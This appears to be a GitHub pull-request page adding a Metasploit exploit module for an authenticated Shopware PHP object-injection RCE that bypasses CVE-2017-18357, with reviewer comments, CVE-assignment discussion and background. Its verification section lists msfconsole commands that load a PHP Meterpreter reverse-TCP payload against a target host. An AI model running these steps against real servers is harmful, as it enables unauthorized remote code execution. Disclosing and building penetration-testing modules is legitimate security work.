Added CVE-2017 18357 - Shopware createInstanceFromNamedArguments PHP Object Instantiation #11828
Conversation
modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
Hi, just a heads up. I'm having issues with my laptop after the Mojave upgrade, it may take a few days for me to be able to start testing this PR again. Thanks for waiting @stevenseeley !
duuuuuude, of course, take your time!
I ran into a little trouble due to a bug but the exploit has been confirmed:
I can fix that bug and then land it. Thank you for the patience @stevenseeley. Always happy to see your work!
Ok now this output is better:
Nothing major, it's just I had to make sure the PHP payload path is normalized: php = Rex::FileUtils.normalize_unix_path("#{webroot}#{target_uri.path}media/#{@shll_bd}.php") Landing now!
Release Notes
Shopware 5 is the next generation of open source e-commerce software made in Germany. Based on bleeding edge technologies like Symfony 3, Doctrine 2 & Zend Framework, Shopware comes as the perfect platform for your next e-commerce project. Furthermore Shopware 5 provides an event-driven plugin system and an advanced hook system, giving you the ability to customize every part of the platform. In the createInstanceFromNamedArguments method, a PHP object instantiation vulnerability was discovered by @KarimOuerghemmi of RIPS, who rated the bug as a CVSS 3.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) due to leveraging an XXE primitive. Later on, I bypassed the whitelist patch and found an RCE primitive via PHP object injection. Note that authentication is required to exploit this vulnerability.
So, I had a conversation with some MITRE & CERT folks about this bug, and the consensus landed on that this does seem to describe a new vulnerability after all. Looking at rule CNT1, it's an independently fixable issue, so it looks like the old vuln and this new vuln are, from CVE's perspective, two different vulnerabilities (even though they end up hitting the same codepath). Practically speaking, someone looking at Shopware CVEs from a vuln management perspective may not know that the old patch is insufficient unless and until there's a new CVE that specifically points that out. I'll take on wrangling that new CVE for @stevenseeley .
In PR rapid7#11828, the module author requested, and got, a new CVE for this issue. The module should reflect that.
Background
Shopware 5 is the next generation of open source e-commerce software made in Germany. Based on bleeding edge technologies like Symfony 3, Doctrine 2 & Zend Framework, Shopware comes as the perfect platform for your next e-commerce project. Furthermore, Shopware 5 provides an event-driven plugin system and an advanced hook system, giving you the ability to customize every part of the platform.
In the createInstanceFromNamedArguments method, a PHP object instantiation vulnerability was discovered by @KarimOuerghemmi of RIPS, who rated the bug as a CVSS 3.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) because the primitive he leveraged was XXE. Later on, I bypassed the whitelist patch and found an RCE primitive via PHP object injection. Note that authentication is required to exploit this vulnerability.
This vulnerability is a bypass for CVE-2017-18357 and was tested on Shopware git branches 5.6 (currently the latest), 5.5, 5.4, 5.3.
References
Notes
Setup
The following is the exact setup I used to test and analyze the vulnerability:
For installation instructions, please refer to the Shopware installation guide.
Verification
msfconsole
use exploit/multi/http/shopware_createinstancefromnamedarguments_rce
set payload php/meterpreter/reverse_tcp
set LHOST x.x.x.x
set RHOSTS y.y.y.y
check
exploit
Example